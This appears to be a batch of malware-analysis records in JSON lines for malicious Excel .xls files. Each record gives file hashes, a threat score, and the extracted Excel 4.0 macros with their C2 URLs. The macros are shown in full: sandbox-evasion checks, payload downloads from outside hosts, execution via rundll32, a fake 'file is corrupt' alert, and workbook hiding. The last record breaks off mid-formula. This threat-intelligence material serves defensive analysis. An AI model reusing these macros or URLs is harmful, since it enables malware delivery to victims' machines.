{"version":"0.2","sample":{"sample":"","kind":"file","target":"06a34391acdf39daff40a4bedfcbd8b40336cbc0a25c3e466f091ad19954b252"},"analysis":{"reported":"2020-04-09T16:14:44Z","score":10},"files":[{"filename":"06a34391acdf39daff40a4bedfcbd8b40336cbc0a25c3e466f091ad19954b252","filesize":170496,"md5":"2ce6a953d71a1154d87e615cc5731f82","sha1":"50f282f6896c3b63d1482ad2e5608d232cf68a1f","sha256":"06a34391acdf39daff40a4bedfcbd8b40336cbc0a25c3e466f091ad19954b252","sha512":"d541b5f6bf4f1fdbadb8c7fac6322dfd322d3b4aee8bc1bfd9137d0def889a3666b88dd84b48de2bc6a2792830d421f671cbed1fcd59209d9eac9631a31d7046","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"06a34391acdf39daff40a4bedfcbd8b40336cbc0a25c3e466f091ad19954b252.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"EeZ987ahgH\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"06a5da69ec64152ca78177ce7c980b3bb57078a89f5ab6df50ec5d50cf62ae07"},"analysis":{"reported":"2020-04-09T16:14:44Z","score":10},"files":[{"filename":"06a5da69ec64152ca78177ce7c980b3bb57078a89f5ab6df50ec5d50cf62ae07","filesize":160768,"md5":"ad94fefae510b16186bb5353a93f2830","sha1":"ad9b2994a733d91798f6b0827cffa0d8d7ce236a","sha256":"06a5da69ec64152ca78177ce7c980b3bb57078a89f5ab6df50ec5d50cf62ae07","sha512":"beb080ce8c834322c38f25a3631a24c9dfbccd316d4a7d6ed8aedc1a70e19974336f05d3cfa1814e89fa421d12b33aeb88dbd877b6777f1ec3869398c5392d9f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"06a5da69ec64152ca78177ce7c980b3bb57078a89f5ab6df50ec5d50cf62ae07.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"vIhrbgDsY1\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"06af27c7044d668899b2034cd72fb443243526603f0acddf68f543415e06ce5c"},"analysis":{"reported":"2020-04-09T16:14:44Z","score":10},"files":[{"filename":"06af27c7044d668899b2034cd72fb443243526603f0acddf68f543415e06ce5c","filesize":145920,"md5":"4a84d2420d3667fcd2cc9ef84283d677","sha1":"586f25f078722c5593277a57d6b0b86d79353a1d","sha256":"06af27c7044d668899b2034cd72fb443243526603f0acddf68f543415e06ce5c","sha512":"5ba662f18c4bdaa1c623c6c1151fadbee0ce8884f70827d1cfd016340d51d6ef62557bfea0da2853dd4c0fa48b91471afd398008d194e623513b84d70ac746cb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"06af27c7044d668899b2034cd72fb443243526603f0acddf68f543415e06ce5c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://uenoeakd.site/grwrg24g2g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"giFbx1E48i\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"06db22d7f340ffef4eb5e5a487622acc897a7e8f1f3d85fbc2711e4a7d96e695"},"analysis":{"reported":"2020-04-09T16:14:44Z","score":10},"files":[{"filename":"06db22d7f340ffef4eb5e5a487622acc897a7e8f1f3d85fbc2711e4a7d96e695","filesize":167936,"md5":"1dd1b53d492dd04a64380b4c65f17b2b","sha1":"662a0659b125fae4ef48740c89535e3298455baa","sha256":"06db22d7f340ffef4eb5e5a487622acc897a7e8f1f3d85fbc2711e4a7d96e695","sha512":"f93027767e6cc0d939a105ebe299010aa353d30cb1b085961b6f2afd170cb6180796b2cc83985f6e31ff3bba82e77d884c204ca5c0b40753d90bdb0e8ed85a16","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"06db22d7f340ffef4eb5e5a487622acc897a7e8f1f3d85fbc2711e4a7d96e695.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"tGR1OpRuMW\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"06e3abd46f7674785faaea8d98d54a1fa220238b83ca539cae7ef9c09b31d616"},"analysis":{"reported":"2020-04-09T16:14:44Z","score":10},"files":[{"filename":"06e3abd46f7674785faaea8d98d54a1fa220238b83ca539cae7ef9c09b31d616","filesize":221184,"md5":"5a7ec7b4b007ba8669ad35254cc3c2c5","sha1":"691a1ac9bfbae3f29fc342365c6e6c6e31316654","sha256":"06e3abd46f7674785faaea8d98d54a1fa220238b83ca539cae7ef9c09b31d616","sha512":"a9f97fdd2d3ee0af17b75e13dd69e68fa49888230e76a08bb69bd3d4dc53374c01f73317ab432c88f9794e4eb56b3dc949e2516ffbae33c77934bc1040c4090d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"06e3abd46f7674785faaea8d98d54a1fa220238b83ca539cae7ef9c09b31d616.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://efbzfyvsb.website/f2f23"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-4]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"qwZRlsKeQm\",TRUE)\nGOTO(R$3C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"06f751891e162762129419772dc667d60354f0de006cee3d4ad4db9ead25aa09"},"analysis":{"reported":"2020-04-09T16:14:44Z","score":10},"files":[{"filename":"06f751891e162762129419772dc667d60354f0de006cee3d4ad4db9ead25aa09","filesize":168960,"md5":"c3028b33473877a1cdd61c3eb3923127","sha1":"0dd2ed927d294887e93e2c30f5222a0b2062a674","sha256":"06f751891e162762129419772dc667d60354f0de006cee3d4ad4db9ead25aa09","sha512":"0fa2a59760ad4e1c676e7963aaf6216bb04058fa053c2ac8947d0ae7f9fcb845524a95516a7984a6a80a498d39b7607acd02c98a68f4965eaf9cc142f804868e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"06f751891e162762129419772dc667d60354f0de006cee3d4ad4db9ead25aa09.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"sSOW7Q1smy\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"070609e12cfa98a219d3937929edef898b8c30adc76d3a27c422c31be859c786"},"analysis":{"reported":"2020-04-09T16:14:44Z","score":10},"files":[{"filename":"070609e12cfa98a219d3937929edef898b8c30adc76d3a27c422c31be859c786","filesize":225280,"md5":"ad79f59e5e8be0ebea58a9bb765b6157","sha1":"c4b3da2ba301a4922bc9c381904e187031be0e46","sha256":"070609e12cfa98a219d3937929edef898b8c30adc76d3a27c422c31be859c786","sha512":"c383e4c5c17de01504d8825f76551d25e923f72b69e0286ec9ecd66cdf67ad29f01004b372cecc8fcf4222a97edd65f5111bb4edc49ac1491a596dc9a7e0083c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"070609e12cfa98a219d3937929edef898b8c30adc76d3a27c422c31be859c786.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"qylFVTEGuN\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"07125219123aa9734f8dc38e7b6381af0edf38772bf6a743e3a07e23d638f34a"},"analysis":{"reported":"2020-04-09T16:14:44Z","score":10},"files":[{"filename":"07125219123aa9734f8dc38e7b6381af0edf38772bf6a743e3a07e23d638f34a","filesize":167936,"md5":"4c79ab5cad85dbee56f0f4a98691db19","sha1":"4b8619ad553128e37e16c4f13180079a203057a4","sha256":"07125219123aa9734f8dc38e7b6381af0edf38772bf6a743e3a07e23d638f34a","sha512":"db1ecd75165de2164a830888b2a0f6002def8ebd3086f1cc90aae2d27278927fce22416dd91369c50e2e4f28752ac86fb4e6c0a9cc18b02ccddc1e13db3c0bed","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"07125219123aa9734f8dc38e7b6381af0edf38772bf6a743e3a07e23d638f34a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"yI6RSU07jK\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0724f49a2e5c87578950c8ee2a2b85652d1da23c547b62dc422d9be9bd25bd32"},"analysis":{"reported":"2020-04-09T16:14:44Z","score":10},"files":[{"filename":"0724f49a2e5c87578950c8ee2a2b85652d1da23c547b62dc422d9be9bd25bd32","filesize":147968,"md5":"96d41ad1d9f61e35447278b9a0971530","sha1":"952f6ca1dff195ba808889e639022ad8ca141137","sha256":"0724f49a2e5c87578950c8ee2a2b85652d1da23c547b62dc422d9be9bd25bd32","sha512":"a5bc56e0f6d904b3b8b8a77174ec03b50dbea3dbfc9bb304ac03b3ffa2626c79319c2edd3b9d5f47c26d1cc0a09c13b46a8019b01839bfeb7168676fb2185740","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0724f49a2e5c87578950c8ee2a2b85652d1da23c547b62dc422d9be9bd25bd32.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://hxzfvomd.buzz/asf2f1ff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"ddhEgWyZw5\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"072a31144192be96a84cb999eca72d0f0cf950fe22776608d05271027671e4bf"},"analysis":{"reported":"2020-04-09T16:14:44Z","score":10},"files":[{"filename":"072a31144192be96a84cb999eca72d0f0cf950fe22776608d05271027671e4bf","filesize":185344,"md5":"c52ddc0c8ff5c94c14245a9b5f208d31","sha1":"5c4604fa15659d4c3e78a539ea55868a3670c91c","sha256":"072a31144192be96a84cb999eca72d0f0cf950fe22776608d05271027671e4bf","sha512":"fc3bc08e717893e4d903b4455e82a8332061357b4740278e5e44fb50387951ebb928a50fc6a3d21273e15160e29e980b79eb16e9a6274a6a1b5e3c6959cc6210","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"072a31144192be96a84cb999eca72d0f0cf950fe22776608d05271027671e4bf.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"072b73ea0de08e9af54a2daa6697bf3c3c3f619f966332c3fa23b9e20e9a0f98"},"analysis":{"reported":"2020-04-09T16:14:44Z","score":10},"files":[{"filename":"072b73ea0de08e9af54a2daa6697bf3c3c3f619f966332c3fa23b9e20e9a0f98","filesize":112640,"md5":"faf3c806b8740af45279e6a5ae47af86","sha1":"055a1a5cd2a5e68e237603d8c52f474641337ca9","sha256":"072b73ea0de08e9af54a2daa6697bf3c3c3f619f966332c3fa23b9e20e9a0f98","sha512":"3dca02ca33aa564a8e66f6fbf7947f18d1564d1e3fd4a55c9daf3f1a8ee9fb9a60bcf2c3a6644d796e5c3773ad9791366e2b0d472c4d6914c2584c3616777e79","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"072b73ea0de08e9af54a2daa6697bf3c3c3f619f966332c3fa23b9e20e9a0f98.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KDSBVksdhv778a"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"07395da84af03d61a1b907c7f48da523eed34d79d2e004e300c53233b8f60b52"},"analysis":{"reported":"2020-04-09T16:14:44Z","score":10},"files":[{"filename":"07395da84af03d61a1b907c7f48da523eed34d79d2e004e300c53233b8f60b52","filesize":116224,"md5":"df97a2a38b2c19dedc87666bd66e3dd4","sha1":"3acfa52fd80d8a29b25be6a7afecd7d347338e77","sha256":"07395da84af03d61a1b907c7f48da523eed34d79d2e004e300c53233b8f60b52","sha512":"273055cf68caffd46e9f2ca74bb885ee20362179dbed7759d2b50bbdc18d3d8852f1e1879f651bb38a9903c4deb9799d3f66334a2ae8ca167d629d804a0e79a2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"07395da84af03d61a1b907c7f48da523eed34d79d2e004e300c53233b8f60b52.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"dhh4Czzozw\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"073dbd81cc4126615763c86e9568df148264f6f689c0e6ea74a4146666ee19a7"},"analysis":{"reported":"2020-04-09T16:14:44Z","score":10},"files":[{"filename":"073dbd81cc4126615763c86e9568df148264f6f689c0e6ea74a4146666ee19a7","filesize":109568,"md5":"e4f720e62fcefcfa5bceed2792bb014a","sha1":"cd2cab7783c1bcba679c854d5540302064b5e62a","sha256":"073dbd81cc4126615763c86e9568df148264f6f689c0e6ea74a4146666ee19a7","sha512":"47e905fc4d38f15920d67b5c4fe0a44887d57f6dcdaed01507787dcaac8095f40767e6f95fb03c95a807e0c1d4fa660b14116debdab1ed2d74515ae5f58bcb0d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"073dbd81cc4126615763c86e9568df148264f6f689c0e6ea74a4146666ee19a7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wgyafqtc.online/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(13)\u003c770,CLOSE(FALSE),)\nIF(GET.WORKSPACE(14)\u003c381,CLOSE(FALSE),)\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"UMOjjJdBS5\",TRUE)\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"074cdab12170dfd85df13f506d3fb3faf33c623f7c663e9ab1a78193e35296e6"},"analysis":{"reported":"2020-04-09T16:14:44Z","score":10},"files":[{"filename":"074cdab12170dfd85df13f506d3fb3faf33c623f7c663e9ab1a78193e35296e6","filesize":152576,"md5":"d85089be0e702bf553b9d12b7a156058","sha1":"c577c4162552cdc4ed328c98dfec9ef8b71d0502","sha256":"074cdab12170dfd85df13f506d3fb3faf33c623f7c663e9ab1a78193e35296e6","sha512":"4d70b33b590820f583bb62f5e7bdf8b579f35e0d66a982bb31804fd9f74546534a1d82d4b60c093cc9731e1e5f02bc39cbb56f696d04082233187912d58dc780","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"074cdab12170dfd85df13f506d3fb3faf33c623f7c663e9ab1a78193e35296e6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"SWGW3zKKRw\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0752ef9edf742b2223fa2aa96365f75078a71cf9c6f1b6ccc085dba1df4c2eb2"},"analysis":{"reported":"2020-04-09T16:14:44Z","score":10},"files":[{"filename":"0752ef9edf742b2223fa2aa96365f75078a71cf9c6f1b6ccc085dba1df4c2eb2","filesize":168960,"md5":"bf71e3e1ceabdd9c6f9f4a84faf41f07","sha1":"6ede9a05c5ca4fc76174e4b57bc49c08fdc71ef6","sha256":"0752ef9edf742b2223fa2aa96365f75078a71cf9c6f1b6ccc085dba1df4c2eb2","sha512":"8e5d595c8ca10d36865b1db1150c158b1d7cc4ab4c577cae7e49653d72907e66b2c00a663bbc9953398ccf6b9f5020e4da8418bbc460f9cfd5cae37936624771","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0752ef9edf742b2223fa2aa96365f75078a71cf9c6f1b6ccc085dba1df4c2eb2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"5bJHcSauX1\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0758c9dd59480b3f6a10bd30f5b1f4b421d49d5d669cc9d087ce7dec193bc1db"},"analysis":{"reported":"2020-04-09T16:14:44Z","score":10},"files":[{"filename":"0758c9dd59480b3f6a10bd30f5b1f4b421d49d5d669cc9d087ce7dec193bc1db","filesize":113664,"md5":"d918187de1b47c86e91cc147d8a15690","sha1":"13867bff57629e40fc2a1740f9652affb7e714c8","sha256":"0758c9dd59480b3f6a10bd30f5b1f4b421d49d5d669cc9d087ce7dec193bc1db","sha512":"ed6c5539e609308088d0659b0807add3d1831eaaa867358c9332795a66b356752c3456431c51276153316ec341ec080985d7ef688e96c0821d025ce47debb1df","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0758c9dd59480b3f6a10bd30f5b1f4b421d49d5d669cc9d087ce7dec193bc1db.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://murreeweather.com/wp-content/white/444444.png","http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png","http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png","http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://murreeweather.com/wp-content/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is 